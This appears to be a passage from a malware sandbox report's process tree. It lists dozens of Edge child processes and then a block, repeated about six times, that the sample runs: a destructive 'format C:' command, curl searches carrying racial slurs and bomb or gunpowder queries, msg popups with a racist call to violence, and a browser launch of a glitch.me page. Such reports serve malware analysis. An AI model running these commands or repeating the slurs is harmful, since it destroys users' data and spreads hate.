    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5928,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=6052 /prefetch:14
        5⤵
        
        PID:4508
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6016,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=6072 /prefetch:14
        5⤵
        
        PID:3052
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6348,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=6364 /prefetch:14
        5⤵
        
        PID:4044
    - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7128,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=6460 /prefetch:14
        5⤵
        
        PID:2984
    - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7128,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=6460 /prefetch:14
        5⤵
        
        PID:2408
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=7488,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=7524 /prefetch:1
        5⤵
        
        PID:5456
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=7884,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=7932 /prefetch:1
        5⤵
        
        PID:5676
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=3416,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=8244 /prefetch:1
        5⤵
        
        PID:124
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=5556,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=3716 /prefetch:1
        5⤵
        
        PID:5060
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=5168,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=3712 /prefetch:1
        5⤵
        
        PID:3836
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=5348,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=5148 /prefetch:1
        5⤵
        
        PID:5588
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=3884,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=5144 /prefetch:1
        5⤵
        
        PID:5756
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=8060,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=7752 /prefetch:1
        5⤵
        
        PID:1060
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=7828,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=7356 /prefetch:1
        5⤵
        
        PID:5932
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=8392,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=5068 /prefetch:1
        5⤵
        
        PID:3180
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=8268,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=8488 /prefetch:1
        5⤵
        
        PID:4748
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=8600,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=5380 /prefetch:1
        5⤵
        
        PID:3680
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=8740,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=8724 /prefetch:1
        5⤵
        
        PID:3656
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=9040,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=8608 /prefetch:1
        5⤵
        
        PID:4820
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=8904,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=8684 /prefetch:1
        5⤵
        
        PID:2060
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=9304,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=9336 /prefetch:1
        5⤵
        
        PID:4756
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=9264,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=9460 /prefetch:1
        5⤵
        
        PID:5272
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=8760,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=9104 /prefetch:1
        5⤵
        
        PID:2664
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=9824,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=9776 /prefetch:1
        5⤵
        
        PID:5908
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=10040,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=10048 /prefetch:1
        5⤵
        
        PID:2364
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=10140,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=10184 /prefetch:1
        5⤵
        
        PID:1240
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=10340,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=10364 /prefetch:1
        5⤵
        
        PID:3464
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --always-read-main-dll --field-trial-handle=10544,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=10564 /prefetch:1
        5⤵
        
        PID:6380
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=10812,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=10700 /prefetch:1
        5⤵
        
        PID:6756
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10724,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=10900 /prefetch:14
        5⤵
        
        PID:6884
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10528,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=10484 /prefetch:14
        5⤵
        
        PID:6892
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10912,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=10696 /prefetch:14
        5⤵
        
        PID:6900
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=11072,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=11092 /prefetch:1
        5⤵
        
        PID:3084
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=9736,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=10884 /prefetch:1
        5⤵
        
        PID:6572
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=11392,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=11376 /prefetch:1
        5⤵
        
        PID:7012
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=11628,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=11656 /prefetch:1
        5⤵
        
        PID:6332
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=11536,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=11568 /prefetch:1
        5⤵
        
        PID:6984
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=11972,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=1988 /prefetch:1
        5⤵
        
        PID:6372
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=12148,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=12172 /prefetch:1
        5⤵
        
        PID:5460
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=12348,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=12312 /prefetch:1
        5⤵
        
        PID:6872
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=12240,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=12164 /prefetch:1
        5⤵
        
        PID:7028
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4084
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:5988
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:4564
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:3508
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:3824
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4240
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3836
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5344
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3904
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2400
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3672
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4260
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:5112
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:2824
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:1540
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:2156
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5204
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2100
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5060
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5108
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5840
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2976
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5488
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:1856
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:4584
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:5228
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:2028
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4844
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6056
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2740
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3236
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4940
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5360
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5060
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:4440
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:4232
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:2984
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:3828
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1676
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4012
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3700
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1008
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1136
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3148
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2072
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:4024
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:4700
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:1252
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:4880
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3272
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5836
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5488
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5268
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:872
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5860
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4232
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:296
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:3704
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:4592
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:2740
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4928
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4380
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4216
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1756
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3728
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4772
  - - C:\Windows\system32\curl.exe
